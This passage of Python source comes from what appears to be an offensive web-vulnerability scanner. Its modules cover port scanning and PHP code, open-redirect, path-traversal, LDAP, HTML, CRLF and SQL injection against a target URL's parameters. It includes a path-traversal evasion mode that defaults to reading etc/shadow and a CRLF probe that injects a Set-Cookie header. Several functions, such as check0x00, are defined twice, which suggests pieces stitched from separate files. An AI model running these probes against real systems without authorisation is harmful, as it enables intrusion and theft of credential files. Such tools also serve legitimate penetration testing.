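                pool.apply_async(portloop, args=(l, verbose, ip_host,))
                for l in prtlst
            ]
            for i in res:
                j = i.get()
                open_ports += j[0]
                closed_ports += j[1]
        print(O + "\n [!] Scanning completed at %s" %
              (time.strftime("%I:%M:%S %p")))
        ending_time = time.time()
        total_time = ending_time - starting_time
        print(GR + ' [*] Preparing report...\n')
        time.sleep(1)
        print(O + ' ——·+-------------+')
        print(O + ' [ SCAN REPORT ] stealthscan')
        print(O + ' +-------------+ --------------')
        print(O + ' ')

        border = O + ' +--------+------------------+'
        print(border)
        print(O + ' | ' + GR + 'PORT'.ljust(7) + O + '| ' + GR +
              'STATE'.ljust(17) + O + '|')
        print(border)
        if open_ports:
            for i in sorted(open_ports):
                # One padded row replaces the five per-digit-count branches;
                # the widths follow the border (8 and 18 columns).
                print(O + ' | ' + C + str(i).ljust(7) + O + '| ' + G +
                      'OPEN'.ljust(17) + O + '|')
                print(border)
                time.sleep(0.2)
        else:
            print('' + R + " [-] Sorry, No open ports found.!!")
        print(O + '\n [!] ' + str(len(closed_ports)) + ' closed ports not shown')
        print(C + " [!] Host %s scanned in %s seconds" % (target, total_time))
    except KeyboardInterrupt:
        print(R + "\n [-] User Requested Shutdown...")
        print(" [*] Exiting...")
        quit()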
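def phpi(web):
    """Entry point of the PHP code injection module for the target ``web``.

    Sets the module-level record keys used by ``save_data``, reads the scope
    parameter and the parallel switch from ``properties`` (a single space
    means "ask the operator"), loads payloads through ``getFile0x00`` and
    passes each request to ``check0x00`` (serial) or ``checkpre`` (parallel).
    """
    global name, lvl2, module, lvl1, lvl3
    name = targetname(web)
    lvl2 = inspect.stack()[0][3]  # this function's own name
    module = "VulnAnalysis"
    lvl1 = "Critical Vulnerabilities"
    lvl3 = ""
    time.sleep(0.5)
    from core.methods.print import pvln
    pvln("php code Injection")
    gen_headers = {
        'User-Agent':
        'Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:2.2) Gecko/20110201',
        'Accept-Language': 'en-US;',
        'Accept-Encoding': 'gzip, deflate',
        'Accept':
        'text/php, application/xhtml+xml, application/xml;',  # important -> text/php
        'Connection': 'close'
    }
    print(GR + ' [*] Initiating ' + R + 'Parameter Based Check...')
    if properties["PARAM"][1] == " ":
        param = input(O + ' [§] Scope parameter (eg. /vuln/page.php?q=lmao) :> ')
    else:
        param = properties["PARAM"][1]
    if not param.startswith('/'):
        param = '/' + param
    choice = ""
    if "&" in param:
        ln = len(param.split("&"))
        choice = input(
            " [!] Discovered {} parameters. Which one to use? (enter name) :> "
            .format(ln))
        if choice not in param:
            sys.exit(" [-] Param {} not found.".format(choice))
    bug2 = ""
    if choice != "":
        n = param.split(choice + "=")[1]
        if "&" in n:
            # Drop the chosen parameter's own value, keep "&other=..." as suffix.
            bug2 = param.split(choice)[1]
            tmp = bug2.split("&")[0]
            bug2 = bug2.replace(tmp, "")
    if properties["PARALLEL"][1] == " ":
        pa = input("\n [?] Parallelise Attack? (enter if not) :> ")
        parallel = pa != ""
    else:
        parallel = properties["PARALLEL"][1] == "1"
    getFile0x00()  # fills the module-level payloads list
    web00 = web + param.split(choice + '=')[0] + choice + '='
    try:
        success = []
        if not parallel:
            for pay in payloads:
                print(GR + '\n [*] Setting parameters...')
                web0x00 = web00 + pay + bug2
                print(C + ' [+] Using payload : ' + B + str(pay))
                print(B + ' [+] Using !nfected Url : ' + GR + str(web0x00))
                success += check0x00(web0x00, pay, gen_headers)
        else:
            paylists = listsplit(payloads, round(len(payloads) / processes))
            with Pool(processes=processes) as pool:
                res = [
                    pool.apply_async(checkpre,
                                     args=(l, web00, bug2, gen_headers,))
                    for l in paylists
                ]
                for y in res:
                    i = y.get()
                    success += i
        if success:
            # The stored record used to say "CRLF Injection", filing the
            # finding under the wrong vulnerability class.
            data = "PHP Code Injection Vulnerability found!\nVulnerable param: " + web00 + "\nPayloads: " + str(
                success)
            save_data(database, module, lvl1, lvl2, lvl3, name, data)
            print(" [+] PHPi Vulnerability found! Successful payloads:")
            for i in success:
                print(i)
        else:
            print(R + "\n [-] No payload succeeded." + C)
            save_data(database, module, lvl1, lvl2, lvl3, name,
                      "No payload succeeded.")
    except Exception as e:
        # Top-level boundary for this module: report and fall through.
        print(R + ' [-] Unexpected Exception Encountered!')
        print(R + ' [-] Exception : ' + str(e))
    print(G + '\n [+] PHPi Module Completed!')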
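def scan0x00(host):
    """Check a fixed list of common ports on ``host`` and print/store the open ones.

    The port list is split with ``listsplit`` and each chunk is handed to
    ``portloop`` in a ``multiprocessing.Pool``; each result is read as
    (open, closed) port lists. Results are written through ``save_data``
    under the "getports" key.
    """
    from core.methods.print import pscan
    pscan("port scanner")
    print(GR + ' [*] Using most common ports...')
    ports = [
        20, 21, 23, 25, 53, 67, 68, 69, 80, 109, 110, 111, 123, 137, 143, 156,
        161, 162, 179, 389, 443, 445, 512, 513, 546, 547, 636, 993, 995, 1099,
        2121, 2049, 3306, 5432, 5900, 6000, 6667, 8080, 8180, 8443, 10000
    ]
    mlprts = listsplit(ports, round(len(ports) / processes))
    print(C + ' [+] Scanning %s ports...' % len(ports))
    try:
        # Only used as a reachability/resolution check; portloop gets `host`.
        socket.gethostbyname(host)
        print(G + '\n [+] Target server detected up and running...' + C +
              color.TR2 + C)
        print(O + ' [*] Preparing for scan...' + C)
    except Exception:
        print(R + ' [-] Server not responding...')
        time.sleep(0.3)
        print(R + ' [*] Exiting...')
        quit()
    open_ports = []
    closed_ports = []
    print(G + " [*] Scanning started at %s" % (time.strftime("%I:%M:%S %p")) +
          C + color.TR2 + C)
    starting_time = time.time()
    try:
        print(O + " [*] Scan in progress.." + C)
        time.sleep(0.8)
        with Pool(processes=processes) as pool:
            res = [
                pool.apply_async(portloop, args=(l, host,)) for l in mlprts
            ]
            for i in res:
                j = i.get()
                open_ports += j[0]
                closed_ports += j[1]
        print(G + "\n [+] Scanning completed at %s" %
              (time.strftime("%I:%M:%S %p")) + C + color.TR2 + C)
        ending_time = time.time()
        total_time = ending_time - starting_time
        print(P + ' [*] Preparing report...\n' + C)
        time.sleep(1)
        openports = " {}{}{}{}{}{}{}{} ports open.".format(
            color.TR5, C, G, str(len(open_ports)), color.END, color.TR2,
            color.END, color.CURSIVE)
        summary("simpleport", openports)
        print()
        border = P + ' +--------+----------+'
        print(border)
        print(P + ' | ' + C + 'PORT'.ljust(7) + P + '| ' + C +
              'STATE'.ljust(9) + P + '|')
        print(border)
        # Record keys for save_data (locals here; `database` and `name` come
        # from module scope).
        lvl2 = "getports"
        module = "ScanANDEnum"
        lvl1 = "Scanning & Enumeration"
        lvl3 = ""
        if open_ports:
            for i in sorted(open_ports):
                # One padded row replaces the five per-digit-count branches;
                # the widths follow the border (8 and 10 columns).
                print(P + ' | ' + C + str(i).ljust(7) + P + '| ' + C +
                      'OPEN'.ljust(9) + P + '|')
                print(border)
                time.sleep(0.2)
            data = "Open Ports: " + str(open_ports)
            save_data(database, module, lvl1, lvl2, lvl3, name, data)
        else:
            save_data(database, module, lvl1, lvl2, lvl3, name,
                      "No open ports found.")
            print(R + "\n [-] No open ports found.!!\n")
        print(B + '\n [!] ' + str(len(closed_ports)) + ' closed ports not shown')
        print(G + " [+] Host %s scanned in %s seconds" % (host, total_time) +
              C + color.TR2 + C + "\n")
    except KeyboardInterrupt:
        print(R + "\n [-] User requested shutdown... ")
        print(' [-] Exiting...\n')
        quit()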
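def openredirect(web):
    """Drive the open-redirect check for one parameterised path on ``web``.

    Settings are read from ``properties``; an entry whose value is ``" "`` is
    asked for on the console instead. The assembled URL, header set and the
    module-level ``payloads`` list are handed to ``check0x00`` (serially or
    through a process pool) and the outcome is stored with ``save_data``.

    ``gen_headers`` pins one hard-coded User-Agent; presumably ``check0x00``
    sends it unchanged, which gives the probes a constant client string in
    the target's access logs.

    Args:
        web: Base URL of the target; the scope path is appended to it.
    """
    # Reporting context consumed by save_data(); lvl2 is this function's name.
    global name, lvl1, lvl2, lvl3, module
    name = targetname(web)
    lvl2 = inspect.stack()[0][3]
    module = "VulnAnalysis"
    lvl1 = "Critical Vulnerabilities"
    lvl3 = ""
    time.sleep(0.6)
    from core.methods.print import pvln
    pvln("open redirect checker")
    default_list = 'files/payload-db/openredirect_payloads.lst'
    try:
        if properties["PARAM"][1] == " ":
            param = input(
                O + ' [§] Scope parameter to test (eg. /redirect.php?site=foo) :> ')
        else:
            param = properties["PARAM"][1]

        if '?' not in param or '=' not in param:
            print(R + ' [-] Your input does not match a parameter...')
            param = input(O + ' [§] Enter paramter to test :> ')

        # The URL is now built on every path. Previously a re-entered
        # parameter or an unrecognised answer left web00 unassigned and the
        # module failed later with an unbound-variable error.
        if param.startswith('/'):
            m = input(
                GR + '\n [!] Your path starts with "/".\n [§] Do you mean root directory? (Y/n) :> ')
            if m.lower() not in ('y', 'n'):
                print(R + ' [-] U mad?')
                return
            web00 = web + param
        else:
            web00 = web + '/' + param

        if properties["PARALLEL"][1] == " ":
            pa = input(" [?] Parallel Attack? (enter if not) :> ")
            parallel = pa != ""
        else:
            parallel = properties["PARALLEL"][1] == "1"

        print(GR + ' [*] Configuring relative headers...')
        time.sleep(0.8)
        gen_headers = {
            'User-Agent': 'Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:2.2) Gecko/20110201',
            'Accept-Language': 'en-US;',
            'Accept-Encoding': 'gzip, deflate',
            'Accept': 'text/html,application/xhtml+xml,application/xml;',
            'Connection': 'close'
        }

        if properties["DICT"][1] == " ":
            print(O + ' [!] Enter path to payload file ' + R +
                  '(Default: files/payload-db/openredirect_payloads.lst)')
            fi = input(O + ' [§] Your input (Press Enter if default) :> ')
        elif properties["DICT"][1].lower() == "none":
            fi = ""
        else:
            fi = properties["DICT"][1]

        # Fall back to the bundled list when nothing usable was supplied.
        if fi == '':
            fi = default_list
        elif os.path.exists(fi):
            print(G + ' [+] File found under ' + fi)
        else:
            print(R + ' [-] File not found... Using default payload...')
            fi = default_list
        getPayloads0x00(fi)

        if properties["COOKIE"][1] == " ":
            input_cookie = input(
                "\n [§] Got any cookies? [just enter if none] :> ")
        elif properties["COOKIE"][1].lower() == "none":
            input_cookie = ""
        else:
            input_cookie = properties["COOKIE"][1]
        if input_cookie:
            gen_headers['Cookie'] = input_cookie

        print(GR + ' [*] Configuring payloads with Url...')
        success = []
        if not parallel:
            success += check0x00(web00, gen_headers, payloads)
        else:
            paylists = listsplit(payloads, round(len(payloads) / processes))
            with Pool(processes=processes) as pool:
                res = [
                    pool.apply_async(check0x00, args=(web00, gen_headers, chunk,))
                    for chunk in paylists
                ]
                for pending in res:
                    success += pending.get()

        if success:
            data = ("Open Redirect Vulnerability found!\nVulnerable param: "
                    + web00 + "\nPayloads: " + str(success))
            save_data(database, module, lvl1, lvl2, lvl3, name, data)
            print(" [+] Open Redirect Vulnerability found! Successful payloads:")
            for i in success:
                print(i)
        else:
            print(R + "\n [-] No payload succeeded." + C)
            save_data(database, module, lvl1, lvl2, lvl3, name,
                      "No payload succeeded.")
    except KeyboardInterrupt:
        print(R + ' [-] User Interruption Detected!')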
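def check0x00(website0, gen_headers, parallel):
    """Sweep ``website0`` with a list of candidate paths and report the hits.

    The path list and the optional evasion target come from ``properties``
    (a value of ``" "`` means "ask on the console"). Each candidate is passed
    to ``atck`` (serial) or ``atckpre`` (process pool); both are expected to
    return six lists, which are merged here and printed per category.

    Args:
        website0: URL prefix handed unchanged to the workers.
        gen_headers: Accepted for interface compatibility; not used here.
        parallel: When true, split the path list across ``processes`` workers.
    """
    loggy = []
    enviro = []
    fud = []
    generic = []
    cnfy = []
    gotcha = []
    # Order matches the indexes the workers return: 0..5.
    buckets = (gotcha, generic, loggy, enviro, fud, cnfy)

    def _collect(paths):
        # Merge one worker result into the six category lists.
        for bucket, found in zip(buckets, paths):
            bucket.extend(found)

    if properties["EVASION"][1] == " ":
        ev = input(
            C + "\n [?] Perform Evasion Attack? (specific file ; enter for no) :> ")
        evasion = ev != ""
    else:
        evasion = properties["EVASION"][1] == "1"

    if not evasion:
        if properties["DICT"][1] == " ":
            # NOTE(review): the prompt names files/pathtrav_paths.lst while the
            # default actually loaded below is files/fuzz-db/pathtrav_paths.lst.
            print(C + ' [!] Enter the filename containing paths ' + O +
                  '(Default: files/pathtrav_paths.lst)' + C)
            fi = input(C + " [*] Custom filepath (press Enter for default) :> ")
        elif properties["DICT"][1].lower() == "none":
            fi = ""
        else:
            fi = properties["DICT"][1]
        if fi == '':
            print(GR + ' [*] Using default filepath...')
            fi = getFile0x00('files/fuzz-db/pathtrav_paths.lst')
        else:
            fi = getFile0x00(fi)
        filepath = ""
    else:
        fi = getFile0x00('files/fuzz-db/pathtrav_evasion.lst')
        if properties["FILE"][1] == " ":
            filepath = input(
                " [!] Enter file and path to search (Default: etc/shadow) :> ")
        elif properties["FILE"][1].lower() == "none":
            filepath = ""
        else:
            filepath = properties["FILE"][1]

    # The original branched on active0 but assigned website0 either way.
    owebsite = website0
    print("")
    requests = session()
    if not parallel:
        # Context manager closes the list file; it used to stay open.
        with open(fi) as path_file:
            for line in path_file:
                _collect(atck(evasion, filepath, owebsite, line, requests))
    else:
        pathlist = file2list(fi)
        pthlst = listsplit(pathlist, round(len(pathlist) / processes))
        with Pool(processes=processes) as pool:
            res = [
                pool.apply_async(atckpre, args=(
                    evasion, filepath, owebsite, chunk, requests,))
                for chunk in pthlst
            ]
            for pending in res:
                _collect(pending.get())

    foundpaths = " {}{}{}{}{}{}{}{} paths leaked.".format(
        color.TR5, C, G, str(len(gotcha)), color.END, color.TR2, color.END,
        color.CURSIVE)
    summary("pathtrav", foundpaths)
    time.sleep(0.5)
    # Only non-empty categories are printed.
    if loggy:
        printOut0x00("Logs", loggy)
    if enviro:
        printOut0x00("/proc/self/environ", enviro)
    if fud:
        printOut0x00("/proc/self/fd", fud)
    if cnfy:
        printOut0x00("Configuration", cnfy)
    if generic:
        printOut0x00("Diverse", generic)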
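def ldap(web):
    """Drive the LDAP-injection check for one parameterised path on ``web``.

    Settings are read from ``properties``; an entry whose value is ``" "`` is
    asked for on the console. The URL is cut after the first ``=`` and passed,
    with the header set and the module-level ``payloads`` list, to
    ``check0x00`` (serially or through a process pool). Results are printed
    only; this function does not call ``save_data``.

    Args:
        web: Base URL of the target; the parameter path is appended to it.
    """
    print(GR + ' [*] Loading module...')
    time.sleep(0.5)
    from core.methods.print import pvln
    pvln("ldap Injection")
    default_list = 'files/payload-db/ldap_payloads.lst'
    try:
        if properties["PARAM"][1] == " ":
            web0 = input(
                O + ' [§] Parameter path to test (eg. /lmao.php?foo=bar) :> ')
        else:
            web0 = properties["PARAM"][1]

        if "?" not in web0 or '=' not in web0:
            sys.exit(R + " [-] Invalid parameters." + C)

        if web0.startswith('/'):
            m = input(
                GR + '\n [!] Your path starts with "/".\n [§] Do you mean root directory? (Y/n) :> ')
            if m.lower() not in ('y', 'n'):
                # Previously fell through with web00 unassigned and surfaced
                # as a generic "Exception" message further down.
                print(R + ' [-] U mad?')
                return
            web00 = web + web0
        else:
            web00 = web + '/' + web0
        print(B + ' [+] Parameterised Url : ' + C + web00)

        if properties["PARALLEL"][1] == " ":
            pa = input(" [?] Parallel Attack? (enter if not) :> ")
            # Value comparison; `is not ""` tested object identity.
            parallel = pa != ""
        else:
            parallel = properties["PARALLEL"][1] == "1"

        if properties["COOKIE"][1] == " ":
            input_cookie = input(
                "\n [*] Enter cookies if needed (Enter if none) :> ")
        elif properties["COOKIE"][1].lower() == "none":
            input_cookie = ""
        else:
            input_cookie = properties["COOKIE"][1]

        print(GR + ' [*] Setting headers...')
        time.sleep(0.6)
        gen_headers = {
            'User-Agent': 'Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:2.2) Gecko/20110201',
            'Accept-Language': 'en-US;',
            'Accept-Encoding': 'gzip, deflate',
            'Accept': 'text/html,application/xhtml+xml,application/xml;',
            'Connection': 'close'
        }
        if input_cookie:
            gen_headers['Cookie'] = input_cookie

        if properties["DICT"][1] == " ":
            print(O + ' [§] Enter the payloads file ' + R +
                  '(Default: files/payload-db/ldap_payloads.lst)...')
            fi = input(O + ' [§] Your input (Press Enter for default) :> ')
        elif properties["DICT"][1].lower() == "none":
            fi = ""
        else:
            fi = properties["DICT"][1]

        # Fall back to the bundled list when nothing usable was supplied.
        if fi == '':
            fi = default_list
        elif os.path.exists(fi):
            print(G + ' [+] File under ' + fi + ' found!')
        else:
            print(R + ' [-] Invalid input... Using default...')
            fi = default_list
        getFile0x00(fi)

        print(O + ' [!] Parsing url...')
        time.sleep(0.7)
        # Keep everything up to and including the first '='.
        web000 = web00.split('=')[0] + '='
        print(GR + ' [*] Starting enumeration...')
        time.sleep(0.7)

        success = []
        if not parallel:
            success += check0x00(web000, gen_headers, payloads)
        else:
            paylists = listsplit(payloads, round(len(payloads) / processes))
            with Pool(processes=processes) as pool:
                res = [
                    pool.apply_async(check0x00, args=(web000, gen_headers, chunk,))
                    for chunk in paylists
                ]
                for pending in res:
                    success += pending.get()

        if success:
            print(" [+] LDAPi Vulnerability found! Successful payloads:")
            for i in success:
                print(i)
        else:
            print(R + "\n [-] No payload succeeded." + C)
    except KeyboardInterrupt:
        print(R + ' [-] Aborting module...')
    except Exception as e:
        print(R + ' [-] Exception : ' + str(e))
    print(G + '\n [+] LDAP Injection module completed!\n')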
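def check0x00(website0, gen_headers, parallel):
    """Sweep ``website0`` with a list of candidate paths and print the hits.

    The path list and the optional evasion target come from ``properties``
    (a value of ``" "`` means "ask on the console"). Each candidate goes to
    ``atck`` (serial) or ``atckpre`` (process pool); both are expected to
    return six lists, which are merged and printed per category.

    Args:
        website0: URL prefix handed unchanged to the workers.
        gen_headers: Accepted for interface compatibility; not used here.
        parallel: When true, split the path list across ``processes`` workers.
    """
    loggy = []
    enviro = []
    fud = []
    generic = []
    cnfy = []
    gotcha = []
    # Order matches the indexes the workers return: 0..5.
    buckets = (gotcha, generic, loggy, enviro, fud, cnfy)

    def _collect(paths):
        # Merge one worker result into the six category lists.
        for bucket, found in zip(buckets, paths):
            bucket.extend(found)

    if properties["EVASION"][1] == " ":
        ev = input(
            O + "\n [?] Perform Evasion Attack? (specific file ; enter for no) :> ")
        evasion = ev != ""
    else:
        evasion = properties["EVASION"][1] == "1"

    if not evasion:
        if properties["DICT"][1] == " ":
            # NOTE(review): the prompt names files/pathtrav_paths.lst while the
            # default actually loaded below is files/fuzz-db/pathtrav_paths.lst.
            print(O + ' [!] Enter the filename containing paths ' + R +
                  '(Default: files/pathtrav_paths.lst)')
            fi = input(O + " [*] Custom filepath (press Enter for default) :> ")
        elif properties["DICT"][1].lower() == "none":
            fi = ""
        else:
            fi = properties["DICT"][1]
        if fi == '':
            print(GR + ' [*] Using default filepath...')
            fi = getFile0x00('files/fuzz-db/pathtrav_paths.lst')
        else:
            fi = getFile0x00(fi)
        filepath = ""
    else:
        fi = getFile0x00('files/fuzz-db/pathtrav_evasion.lst')
        if properties["FILE"][1] == " ":
            filepath = input(
                " [!] Enter file and path to search (Default: etc/shadow) :> ")
        elif properties["FILE"][1].lower() == "none":
            filepath = ""
        else:
            filepath = properties["FILE"][1]

    # The original branched on active0 but assigned website0 either way.
    owebsite = website0
    print("")
    if not parallel:
        # Context manager closes the list file; it used to stay open.
        with open(fi) as path_file:
            for line in path_file:
                _collect(atck(evasion, filepath, owebsite, line))
    else:
        pathlist = file2list(fi)
        pthlst = listsplit(pathlist, round(len(pathlist) / processes))
        with Pool(processes=processes) as pool:
            res = [
                pool.apply_async(atckpre, args=(
                    evasion, filepath, owebsite, chunk,))
                for chunk in pthlst
            ]
            for pending in res:
                _collect(pending.get())

    print(G + "\n [+] Retrieved %s interesting paths...\n" % str(len(gotcha)))
    time.sleep(0.5)
    # Every category is printed, including empty ones.
    printOut0x00("Logs", loggy)
    printOut0x00("/proc/self/environ", enviro)
    printOut0x00("/proc/self/fd", fud)
    printOut0x00("Configuration", cnfy)
    printOut0x00("Generic", generic)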
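def htmli(web):
    """Drive the HTML-injection check for one query parameter on ``web``.

    The scope path, the parameter to test and the parallel flag are asked for
    on the console. Each entry of the module-level ``payloads`` list is placed
    in the chosen parameter and the resulting URL is passed to ``check0x00``
    (serial) or ``checkpre`` (process pool). Results are printed only.

    Args:
        web: Base URL of the target; the scope path is appended to it.
    """
    print(GR + ' [*] Loading module...')
    time.sleep(0.5)
    from core.methods.print import pvln
    pvln("html injection")
    gen_headers = {
        'User-Agent': 'Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:2.2) Gecko/20110201',
        'Accept-Language': 'en-US;',
        'Accept-Encoding': 'gzip, deflate',
        'Accept': 'text/html,application/xhtml+xml,application/xml;',
        'Connection': 'close'
    }
    print(GR + ' [*] Initiating ' + R + 'Parameter Based Check...')
    param = input(O + ' [#] Scope parameter (eg. /vuln/page.php?q=lmao) :> ')
    if not param.startswith('/'):
        param = '/' + param

    choice = ""
    if "&" in param:
        ln = len(param.split("&"))
        choice = input(
            " [!] Discovered {} parameters. Which one to use? (enter name) :> ".format(ln))
        # Require "name=": a bare substring match also accepted fragments of
        # the path and then crashed on the split below.
        if (choice + "=") not in param:
            sys.exit(" [-] Param {} not found.".format(choice))

    # bug2 holds the query string that follows the chosen parameter's value.
    bug2 = ""
    prefix, _, rest = param.partition(choice + "=")
    if choice != "" and "&" in rest:
        value = rest.split("&")[0]
        # Slice instead of str.replace so repeated values elsewhere survive.
        bug2 = rest[len(value):]

    pa = input("\n [?] Parallelise Attack? (enter if not) :> ")
    # Value comparison; `is not ""` tested object identity.
    parallel = pa != ""
    # Called for its side effect; presumably fills `payloads` — TODO confirm.
    getFile0x00()
    web00 = web + prefix + choice + '='
    try:
        success = []
        if not parallel:
            for pay in payloads:
                print(GR + '\n [*] Setting parameters...')
                web0x00 = web00 + pay + bug2
                print(C + ' [+] Using payload : ' + B + str(pay))
                print(B + ' [+] Using !nfected Url : ' + GR + str(web0x00))
                success += check0x00(web0x00, pay, gen_headers)
        else:
            paylists = listsplit(payloads, round(len(payloads) / processes))
            with Pool(processes=processes) as pool:
                res = [
                    pool.apply_async(checkpre, args=(chunk, web00, bug2, gen_headers,))
                    for chunk in paylists
                ]
                for pending in res:
                    success += pending.get()
        if success:
            print(" [+] HTMLi Vulnerability found! Successful payloads:")
            for i in success:
                print(i)
        else:
            print(R + "\n [-] No payload succeeded." + C)
    except Exception as e:
        print(R + ' [-] Unexpected Exception Encountered!')
        print(R + ' [-] Exception : ' + str(e))
    print(G + '\n [+] HTMLi Module Completed!')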
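def manual0x00(web, parallel, properties):
    """Run the manual SQL-injection check against one endpoint on ``web``.

    A baseline response is fetched first; every entry of the module-level
    ``pay`` list is then appended to the chosen parameter and the response
    length is compared with the baseline. Any length difference is recorded
    as a hit, so pages with dynamic content (timestamps, tokens, rotating
    banners) will produce false positives that need manual confirmation.

    Args:
        web: Base URL of the target.
        parallel: When true, hand the payload chunks to ``manualpre`` workers.
        properties: Option table; ``properties["PARAM"][1] == " "`` means the
            endpoint is asked for on the console.
    """
    print(R + '\n S Q L i (Manual Mode)')
    print(R + ' ---<>----<>----<>----<>-\n')
    requests = session()
    if properties["PARAM"][1] == " ":
        bug = input(O + ' [§] Injectable Endpoint ' + R +
                    '(eg. /sqli/fetch.php?id=2)' + O + ' :> ')
    else:
        bug = properties["PARAM"][1]
    bugs = web + bug
    # NOTE(review): certificate verification is disabled for the baseline
    # only; the probe requests below use the session default. Confirm which
    # of the two is intended.
    getrq = requests.get(bugs, timeout=7, verify=False)

    choice = ""
    if "&" in bug:
        ln = len(bug.split("&"))
        choice = input(
            " [!] Discovered {} parameters. Which one to use? (enter name) :> "
            .format(ln))
        # Require "name=": a bare substring match also accepted fragments of
        # the path and then crashed on the split below.
        if (choice + "=") not in bug:
            sys.exit(" [-] Param {} not found.".format(choice))

    # param1 is the chosen parameter's original value, bug2 what follows it.
    bug2 = ""
    param1 = ""
    if choice != "":
        prefix, _, rest = bug.partition(choice + "=")
        if "&" in rest:
            param1 = rest.split("&")[0]
            # Slice instead of str.replace so repeated values survive.
            bug2 = rest[len(param1):]
        bugs = web + prefix + choice + '=' + param1
    print(O + ' [!] Using Url : ' + GR + bugs)

    if '?' in str(bugs) and '=' in str(bugs):
        success = []
        if not parallel:
            for p in pay:
                bugged = bugs + str(p) + bug2
                print(B + " [*] Trying : " + C + bugged)
                sleep(0.7)
                # Same timeout as the baseline so a stalled server cannot
                # hang the loop.
                response = requests.get(bugged, timeout=7)
                if len(response.content) != len(getrq.content):
                    print('\n' + G + ' [+] Vulnerable link detected : ' + bugs)
                    print(GR + ' [*] Injecting payloads...')
                    print(B + ' [!] PoC : ' + str(bugged))
                    print(R + " [!] Payload : " + O + str(p) + '\033[0m')
                    print("\033[1m [!] Code Snippet :\n \033[0m" +
                          str(response) + '\n')
                    success.append(p)
        else:
            paylists = listsplit(pay, round(len(pay) / processes))
            with Pool(processes=processes) as pool:
                res = [
                    pool.apply_async(manualpre, args=(bugs, bug2, chunk, getrq,))
                    for chunk in paylists
                ]
                for pending in res:
                    success += pending.get()
        if success:
            data = ("SQLi Vulnerability found!\nVulnerable Link: " + bugs +
                    "\nSuccessful payloads: " + str(success))
            save_data(database, module, lvl1, lvl2, lvl3, name, data)
            print(" [+] SQLi Vulnerability found! Successful payloads:")
            for i in success:
                print(i)
        else:
            save_data(database, module, lvl1, lvl2, lvl3, name,
                      "(manual) no payload succeeded.")
            print(R + "\n [-] No payload succeeded." + C)
    else:
        print(R + ' [-] Enter an URL with scope parameter...')
        # Asking again only helps when the endpoint is typed in; a preset
        # PARAM would be rejected on every retry and recurse without end.
        if properties["PARAM"][1] == " ":
            manual0x00(web, parallel, properties)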
def crlf(web):
    """Drive the CRLF-injection check against ``web``.

    Two passes are made. The first sends one request whose User-Agent ends in
    an encoded CR/LF followed by a ``Set-Cookie: Infected_by=Drake`` marker
    and hands the returned headers to ``check0x00``. The second places each
    entry of the module-level ``payloads`` list in the scope parameter and
    checks the returned headers the same way. The outcome is stored with
    ``save_data``.

    The marker string is constant, which makes these probes straightforward
    to find in request logs.

    Args:
        web: Base URL of the target.
    """
    # Reporting context consumed by save_data(); lvl2 is this function's name.
    global name, lvl1, lvl2, lvl3, module
    name = targetname(web)
    lvl2 = inspect.stack()[0][3]
    module = "VulnAnalysis"
    lvl1 = "Critical Vulnerabilities"
    lvl3 = ""
    time.sleep(0.5)
    from core.methods.print import pvln
    pvln("CRLF Injection")

    plain_ua = 'Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:2.2) Gecko/20110201'
    marked_ua = plain_ua + '%0d%0aSet-Cookie: Infected_by=Drake'
    gen_headers = {
        'User-Agent': plain_ua,
        'Accept-Language': 'en-US;',
        'Accept-Encoding': 'gzip, deflate',
        'Accept': 'text/html,application/xhtml+xml,application/xml;',
        'Connection': 'close'
    }
    # Same header set, with only the User-Agent carrying the marker.
    inf_headers = dict(gen_headers)
    inf_headers['User-Agent'] = marked_ua

    # Console narration; the pauses are cosmetic.
    print(GR + ' [*] Testing response to normal requests...')
    time.sleep(0.5)
    print(O + ' [*] Setting header values...')
    time.sleep(0.7)
    print(O + ' [*] Initiating ' + R + 'User-Agent Based Check...')
    time.sleep(0.5)
    print(B + ' [+] Injecting CRLF in User-Agent Based value : ' + C + '%0d%0a ...')
    time.sleep(0.7)
    print(O + ' [*] Using !nfected UA Value : ' + inf_headers['User-Agent'])

    # Pass 1: header-based check.
    success = []
    ua_response = getHeaders0x00(web, inf_headers)
    success.extend(check0x00(ua_response, marked_ua))

    # Pass 2: parameter-based check.
    print(GR + ' [*] Initiating ' + R + 'Parameter Based Check...')
    preset_param = properties["PARAM"][1]
    if preset_param == " ":
        param = input(O + ' [§] Scope parameter (eg. /vuln/page.php?crlf=x) :> ')
    else:
        param = preset_param
    if not param.startswith('/'):
        param = '/' + param

    preset_parallel = properties["PARALLEL"][1]
    if preset_parallel == " ":
        parallel = input("\n [?] Parallelise Attack? (enter if not) :> ") != ""
    else:
        parallel = preset_parallel == "1"

    # Called for its side effect; presumably fills `payloads` — TODO confirm.
    getFile0x00()
    # Everything up to and including the first '=' of the full URL.
    web00 = (web + param).partition('=')[0] + '='
    try:
        if parallel:
            paylists = listsplit(payloads, round(len(payloads) / processes))
            with Pool(processes=processes) as pool:
                pending_results = [
                    pool.apply_async(checkpre, args=(chunk, web00, gen_headers,))
                    for chunk in paylists
                ]
                for pending in pending_results:
                    success.extend(pending.get())
        else:
            for pay in payloads:
                web0x00 = web00 + pay
                print(C + ' [+] Using payload : ' + B + str(pay))
                print(B + ' [+] Using !nfected Url : ' + GR + str(web0x00))
                returned = getHeaders0x00(web0x00, gen_headers)
                success.extend(check0x00(returned, pay))

        if not success:
            print(R + "\n [-] No payload succeeded." + C)
            save_data(database, module, lvl1, lvl2, lvl3, name,
                      "No payload succeeded.")
        else:
            data = ("CRLF Injection Vulnerability found!\nVulnerable param: "
                    + web00 + "\nPayloads: " + str(success))
            save_data(database, module, lvl1, lvl2, lvl3, name, data)
            print(" [+] CRLF Injection Vulnerability found! Successful payloads:")
            for hit in success:
                print(hit)
    except Exception as e:
        print(R + ' [-] Unexpected Exception Encountered!')
        print(R + ' [-] Exception : ' + str(e))
    print(G + ' [+] CRLF Module Completed!')
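def sqlicookie0x00(web, parallel):
    """Run the cookie-based SQL-injection check against ``web``.

    A session is opened and a baseline response fetched. If the server set
    cookies, each entry of the module-level ``pay`` list is appended to each
    cookie in turn and the response length is compared with the baseline.
    Any length difference is recorded as a hit, so dynamic pages will yield
    false positives that need manual confirmation. The outcome is stored
    with ``save_data``.

    Args:
        web: URL of the target page.
        parallel: When true, hand the payload chunks to ``cookiepre`` workers.
    """
    print(R + '\n S Q L i (Cookie Based)')
    print(R + ' ---<>----<>----<>----<>--\n')
    sleep(0.5)
    vsession = session()
    req = vsession.get(web)
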